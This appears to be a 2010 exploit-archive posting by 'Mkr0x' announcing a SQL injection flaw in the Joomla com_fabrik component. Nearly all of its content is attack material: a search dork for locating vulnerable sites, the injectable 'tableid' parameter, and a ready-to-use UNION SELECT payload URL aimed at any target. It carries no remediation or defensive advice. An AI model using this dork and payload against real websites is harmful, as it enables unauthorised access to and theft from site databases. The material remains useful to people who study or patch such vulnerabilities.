Joomla Component (com_Fabrik) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component (com_Fabrik) SQL Injection Vulnerability
# Published : 2010-08-21
# Author : Mkr0x
# Previous Title : Joomla Component com_extcalendar Blind SQL Injection Vulnerability
# Next Title : T-dreams Announcement Script SQL Injection Vulnerability

$##################################################################$
# +==============================================================+ 
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability  | 
# +==============================================================+ 
# Vendor : http://fabrikar.com/
# Author : Mkr0x                                            
# Home : www.kernel.ge
# E-mail : mkrcard@gmail.com
# Place : Georgia
$##################################################################$
# Dork : 
 index.php?option=com_fabrik
--
# Vulnerable : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
--
# Exploit : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
--

 Best Regards 
  -Mkr0x-

# ?Georgia has always been at the foreground“ .. 
$##################################################################$